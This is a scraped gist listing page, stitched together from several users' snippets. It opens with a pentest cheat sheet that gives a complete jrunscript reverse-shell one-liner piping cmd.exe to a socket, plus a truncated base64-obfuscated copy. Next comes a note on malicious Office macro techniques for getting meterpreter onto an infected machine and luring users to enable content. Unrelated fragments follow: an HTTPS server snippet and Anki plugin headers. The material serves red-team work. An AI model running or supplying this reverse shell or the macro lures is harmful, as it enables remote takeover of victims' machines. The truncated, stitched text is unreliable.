m1n1 joeminicucci
Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@joeminicucci
joeminicucci / Various-Macro-Based-RCEs.md
Created September 8, 2019 04:21 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic macro-based remote code execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples have been generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring the user to click Enable Content
  2. The Unicorn Powershell based payload
@joeminicucci
joeminicucci / fill_missing.py
Created December 6, 2014 11:47
autofill (chinese support)
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Chris Hatch, <foonugget@gmail.com>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
from aqt.utils import showInfo
from anki.find import Finder
from edit_behavior_model import *
@joeminicucci
joeminicucci / dictdb.py
Last active August 29, 2015 14:10
chinese plugin mods
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Thomas TEMPÉ, <thomas.tempe@alysse.org>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
#COPYRIGHT AND PERMISSION NOTICE
#Copyright © 1991-2012 Unicode, Inc. All rights reserved. Distributed under the Terms of Use in http://www.unicode.org/copyright.html.